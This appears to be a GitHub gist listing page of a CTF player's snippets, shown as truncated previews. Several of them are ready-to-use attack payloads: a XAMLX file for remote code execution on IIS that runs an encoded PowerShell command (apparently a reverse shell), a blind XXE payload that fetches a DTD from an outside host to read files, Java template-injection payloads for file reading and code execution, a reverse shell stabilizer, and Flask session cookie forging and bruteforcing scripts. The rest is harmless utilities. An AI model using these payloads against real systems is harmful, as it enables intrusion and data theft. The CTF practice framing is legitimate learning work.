Skip to content

Instantly share code, notes, and snippets.

View kavishkagihan's full-sized avatar

kavishkagihan

45 followers · 7 following
View GitHub Profile
@kavishkagihan
kavishkagihan / htb-setup.sh
Last active February 16, 2023 17:59
Automated tmux session I use when playing htb boxes
#!/bin/bash
HTB_DATA_DIR=~/Documents/HTB
if [[ $1 ]]; then
a=1
else
echo "Usage: $0 <Box name>"
exit 1
fi
@kavishkagihan
kavishkagihan / stablizer.md
Created September 30, 2022 17:39
Fully automated reverse shell stablizer for both bash and zsh #linux #zsh
  • By default, it will start the litener on port 9090. You can specify the port you want it to start with shell 9001
shell() {

    if [[ $1 ]]; then
        port=$1
    else
        port=9090
 fi
@kavishkagihan
kavishkagihan / a.xamlx
Last active September 18, 2022 16:51
RCE with XAMLX files in MS IIS servers
<?xml version="1.0" encoding="UTF-8"?>
<WorkflowService xmlns="http://schemas.microsoft.com/netfx/2009/xaml/servicemodel" xmlns:mca="clr-namespace:Microsoft.CSharp.Activities;assembly=System.Activities" xmlns:p1="http://schemas.microsoft.com/netfx/2009/xaml/activities" xmlns:sd="clr-namespace:System.Diagnostics;assembly=System" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" ConfigurationName="Service1" Name="Service1">
<p1:Sequence DisplayName="Sequential Service">
<p1:InvokeMethod DisplayName="test" MethodName="Start">
<p1:InvokeMethod.TargetObject>
<p1:InArgument x:TypeArguments="sd:Process">
<mca:CSharpValue x:TypeArguments="sd:Process">/*/System.Diagnostics.Process.Start("");return base.RewriteExpressionTree(expression);}
System.Diagnostics.Process x =System.Diagnostics.Process.Start("cmd.exe", "/c powershell -exec bypass -enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4
@kavishkagihan
kavishkagihan / aliases.md
Last active June 22, 2024 16:49
Useful aliases for CTF players #aliases #bash #zsh #linux #CTF #Hackthebox
  • To easily list files giving more information - ll
alias ll='ls -alhF'
  • First, install xclip in your system. This will let you copy output of a command directly to your clipboard. - cat file.txt|c
alias c='xclip -selection clipboard'
@kavishkagihan
kavishkagihan / blind-xxe.md
Created July 21, 2022 14:23
Blind XXE attack using a dtd file to read files
  • kavi_creds.xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM 'http://10.10.14.101/kavi.dtd'> %xxe;]>
<credits>
  <author>&xxe;</author>
</credits>
  • kavi.dtd
@kavishkagihan
kavishkagihan / java-ssti.md
Last active November 29, 2024 18:12
Java ssti payloads to read remote files and get RCE

  • Typically java ssti payloads start with $. But if that character is banned you can use * instead of that.

  • Get env vars

*{T(java.lang.System).getenv()}
  • Read files (/etc/passwd)
@kavishkagihan
kavishkagihan / flask-cookie-creator.py
Created June 3, 2022 17:04
A simple python script to create flaks session cookies
@kavishkagihan
kavishkagihan / flask-cookie-bruteforcer.py
Created June 3, 2022 17:00
A simple python script to bruteforce the app secret of a flask application using the cookie
@kavishkagihan
kavishkagihan / text2image.py
Created June 3, 2022 16:29
A simple python script that uses Pillow to embed text in an image
#!/usr/bin/env python
from PIL import Image, FontFile, ImageFont, ImageDraw
class RenderText2Image:
##Defines
FULL_PATH_TO_FONT = './LiberationMono-Regular.ttf'
_bgcolor = None
_fontColor = None
_text = None
_error, _errmsg = 1, None
@kavishkagihan
kavishkagihan / RSA n-e Extracter.py
Last active November 29, 2021 18:05
from Crypto.PublicKey import RSA
from base64 import b64encode as b64
def int2bytes(number):
return number.to_bytes((number.bit_length() + 7) // 8, byteorder="big")
fp = open("publickey.crt", "r")
key = RSA.importKey(fp.read())
fp.close()